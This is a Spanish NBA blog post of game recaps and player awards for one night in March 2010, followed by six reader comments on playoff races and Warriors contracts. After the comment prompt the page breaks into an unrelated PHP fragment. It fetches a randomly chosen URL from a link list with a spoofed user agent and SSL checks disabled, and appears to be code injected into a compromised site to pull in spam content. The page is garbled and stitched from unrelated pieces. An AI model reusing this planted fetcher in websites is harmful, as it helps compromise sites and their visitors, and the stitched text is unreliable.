La Crónica (28/03/2010)

29 de March de 2010 por txusma

Desayunamos con los resultados de anoche delante y tenemos muchas dudas acerca de por dónde empezar.

No sabríamos si destacar el excelente partido “toma y daca” de Orlando frente a Denver, en el que J.J. Redick se destapó como el héroe de la noche sustituyendo a Vince lesionado y cuajando el partido de su vida, o el tremendo palizón que se llevaron los Celtics en casa contra unos Spurs que no les dejaron ni respirar. Ginobili, por cierto, se encuentra en su segunda juventud.

Muy interesante estuvo también el Portland@Oklahoma, éste en términos defensivos entre dos de los equipos más duros de la liga. La defensa de McMillan no pudo parar a Durant, muy pocos podrían hacerlo, pero sí logró secar a Westbrook, mientras Roy y André Miller imponían su ataque. Rudy no lanzó ni una sola vez a canasta en un cuarto de hora de juego. Igual es que McMillan está esperando a verse contra las cuerdas en playoffs para darle el más mínimo protagonismo, como ya hizo el año pasado.

Precioso fue el Grizzlies vs Bucks. Se resolvió en la prórroga y por ahí los Bucks tienen más fondo. Marc volvió de su lesión y cumplió como buenamente pudo contra Bogut. Zach Randolph estuvo a nivel all-star como acostumbra esta temporada pero no fue suficiente ante el buen hacer de Salmons y Jennings. Éste último ya parece haber dejado atrás el rookie-wall.Espectacular remontada de Wade y Heat ante los Raptors (sí, otra vez). Flash es Flash, pero la facilidad con la que el equipo de Calderón regala partidos casi ganados resulta decepcionante. Les remontan el partido y va por la misma linde la temporada. Los Bulls dejaron a los Pistons matemáticamente sin postemporada y se ponen otra vez a tiro de PO. Ronald Murray estuvo decisivo.

Por clasificación no solemos mencionar a Cavs y Hawks tan abajo. No sorprende que ganen a Kings o Pacers. Casi sorprende más que éstos les plantaran cara.

Finalmente los Suns le endosaron la 16ª a los Wolves y los Warriors vapulearon a los Clippers.  La parejita Reggie Williams y Anthony Tolliver es la bomba.

PREMIOS

MVP: Día de esos aburridos con dos clásicos copando el MVP. Lebron James, 34 puntos, 7 rebotes, 8 asistencias y 3 robos, Dwyane Wade, 32 puntos, 7 rebotes, 6 asistencias, 5 robos y 3 tapones. Lo hacen tan a ménudo que casi ni nos sorprende.

Rookie: Habrá que tocar la cresta más a menudo a los jugadores porque ultimamente jugador que criticamos, jugador que decide dejarnos en mal lugar. Es lo que hace últimamente Brandon Jennings, que una vez superado el Rookie Wall, vuelve a deleitarnos con actuaciones como la de ayer: 29 puntos, 7 rebotes, 8 asistencias y 4 robos.

Sorpresa: Sin Vince Carter, JJ Redick se ha convertido en la figura de los Magic en su victoria frente los Nuggets. Ha disfrutado de 46 minutos y él ha correspondido con 23 puntos, 7 rebotes y 8 asistencias. Gran noticia para los que todavía confían en el ex de Duke.

Decepción: Parece complicado llegar a ser el jugador que más veces por minuto tira en tu equipo si lo compartes con Dwayne Wade, pero Michael Beasley es capaz de todo. Lo peor es que sólo anotó 1 de sus 10 intentos y además perdió 4 balones. Contentos deben estar en Miami.

Esfuerzo en vano: 23 puntos, 22 rebotes, 2 robos y 3 tapones. ¡Qué grande es Kevin Love y qué penita dan los Wolves!

Comenta

6 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Tengo curiosidad por qué harán Nelson y los Warriors con los D-Leaguers de cara a la próxima temporada.
    Creo que Reggie Williams sí tiene garantizado un pellizquillo, pero Tolliver no.

    Contratos garantizados casi en el límite salarial: Ellis (11K), Biedrins(9), Maggette (casi 10), Vlad (7 con player option), Turiaf (4), Azubuike (3), Curry (3), Wright (3), Randolph (2), Morrow (1) y Williams (casi 1)
    Supongo que lo suyo será renovar a CJ Watson y Tolliver. A Raja Bell dudo que lo renueven.

    El caso es que nombres en mano y con suponiendo un rendimiento constante de Tolliver y Williams (mucho suponer) no se les queda un equipo feo… pero imposible entrar en PO, claro.

      Citar

  2. LEmontus dice:
    #2

    Yo la verdad sigo sin ver una diferencia avismal entre conferencias o será que a bucks se le nota muchísimo cuando juega en casa a cuando lo hace fuera. Buen partido de bucks que pienso que dejó claro que la clave para tumbar a cualquiera en PO será Bj3, si el está bucks juega muy bien.

    Volviendo al tema Thabeet creo que habrá que analizarlo el próximo año o el siguiente…. como se nota que no está acostumbrado a que lo puedan taponar.

      Citar

  3. LEmontus dice:
    #3

    Pido perdon por lo de ´´avismal´´ hace daño verlo… El tema warriors lo veo difificil de predecir , pero si estuviera en mi mano a los D-leaguers los corrtaría como mucho dejarlos como banquillo.(Gracias por los serivicios prestados pero adios).De todas maneras creo que con alguno se quedarán hace poco leí que habian cortado a bell para hacer hueco a uno de los D-Leaguers(No estoy 100% seguro puede que me equivoque). Lo de que tienen imposible los PO…..Creo que un :

    Curry
    Escolta por monta-Cj Watson
    Azubuike-Maggette
    Randolph -Turiaf Todo esto + Morrow – Ramanovic-Reggie
    Biedrins-Pick

    Si se mueven bien y cojen un buen escolta y un pivot con calidad ofensiva, y Randolph demuestra que puede ser un 15-10-2(tapones) o incluso algo mejor los veo de Po seguro ,ahora claro son muchos Si…. Si…

      Citar

  4. pcerezo dice:
    #4

    La octava plaza del este apuesto que al final va a ser para Bulls, me da a mí que Bosh, Bargnani y Turkoglu no les apetece nada de nada caer 4-0 con Cavs, se hacen apuestas?

      Citar

  5. CAMPO2 dice:
    #5

    Los Raptors se estan suicidando, que pena da ver a que entren equipos en post temporada con un nivel tan bajo.

      Citar

  6. Rompe dice:
    #6

    Sobre todo viendo los que se quedan fuera en el oeste…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>